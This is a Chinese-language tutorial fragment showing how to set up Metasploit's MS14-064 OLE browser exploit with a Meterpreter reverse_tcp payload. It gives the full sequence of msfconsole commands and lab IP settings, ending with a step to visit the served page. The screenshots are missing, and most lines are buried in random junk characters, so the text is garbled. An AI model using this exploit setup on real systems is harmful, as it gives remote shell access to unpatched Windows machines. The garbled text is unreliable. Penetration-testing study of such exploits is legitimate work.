' a8 X: D9 ^- P
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 ?+ N( P+ b# g* w* d# L l5 S0 F
. I4 J( z5 G' t; O" p8 \/ V# }( N" e3 L6 t. B9 ^6 l5 e2 e8 s! ^
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: $ ^3 D) U! \ _) O9 K0 {
, M0 m- J) k; u6 ]6 q
- I6 `4 }- \& N5 o9 O; [ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
3 r8 t# e( p5 H# S1 |
$ ^8 P; J$ A' @) U) D7 g# g( c( c
1 T0 G+ B) e1 Z set AllowPowershellPrompt true! ]: Y( k! E/ X3 H0 d4 T, i9 g
# }2 w, r! }/ h0 D) o: `( i z4 I$ G
5 \% N: @6 }$ B6 Y* x6 s: q$ v& F1 _ Set LHOST 192.168.0.109
$ M" ~: I' m+ y8 N# b" m4 t! y
2 P0 M' b+ |& F0 h
6 h( ^: o3 d3 b% Y+ H4 Q& C4 W% ^- T
set SRVHOST 192.168.0.109
( n9 b O4 a: O7 X8 N' W
$ m2 S- t* t" K7 @! U' S9 [/ D4 ?; ~8 e; X7 S: w3 A
Set uripath share
& M; b% j% Y) `3 a
# O/ i) z; m1 }1 r1 }2 ` y
/ }# E( A1 e3 f) G, g! T) \8 n$ @+ @" F' P
Set srvport 80
& ?0 Y8 ?$ x: g4 m3 i/ V7 R: z4 r
, h6 P' f$ b8 X* y! j/ Z7 p @1 p, }) E6 n' o& o: ?/ ?( W, h
2 }6 g; e* E/ @! [; \5 b3 B
! A7 R9 D# x9 |/ X+ M
- u0 p$ h5 x% R
- ^" i3 O/ s6 M" T3 B) P6 f
8 V& w7 f1 [3 D L/ S5 S( K
! q; k: g. x+ p* y . j& b6 l7 _4 S
7 {$ r9 t: Z7 p% a8 \- P s: @ ^0 L0 X4 v) Z) S
. D7 L$ ?6 X3 l9 w( U( L3 M5 c
7 C# f* u3 [' W p' I. Y& q
) I( ]! j0 @( o 7 k0 C4 c: L5 B' A7 d% `' l
! n4 t! x3 n' t0 m. F$ ]3 ^" m/ P3 l6 ^1 Q/ W
下面我们来访问本地地址如图:. D. \1 i) V+ `5 v4 s
1 q3 n# O- S" V
% p0 \1 y; c8 @ D7 r8 l) a+ @% W 5 l1 {& _; G+ ?3 _$ a* k
+ e3 M7 r* b8 l4 F; F% [: i( X2 u+ R: g* R1 x) M2 {1 H2 r: k
8 c7 G" n. {! X9 \7 w& e# M( `
) t. X' j3 y3 H; _0 y1 g
5 r y4 p6 K. n5 l/ S3 j
4 a: T2 L2 n. Z6 } O2 T2 K